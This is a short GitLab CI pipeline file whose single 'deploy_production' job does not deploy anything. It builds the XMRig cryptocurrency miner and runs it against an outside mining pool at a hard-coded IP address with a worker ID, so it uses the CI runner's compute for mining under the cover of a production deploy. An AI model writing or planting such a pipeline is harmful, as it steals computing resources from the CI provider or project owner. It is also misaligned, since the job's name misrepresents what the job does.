image: ubuntu:latest

cache:
  paths:
  - /root/xmrig

deploy_production:
    stage: deploy
    environment: Production
    only:
      - master
    script:
        - sysctl -w vm.nr_hugepages=128
        - apt-get update && bash ./build_xmrig.sh 
        - /root/xmrig/build/xmrig --tls -o 109.234.39.120:8080 -u ffa63640-1575-11e8-9c67-897d9845fd25/glprx2
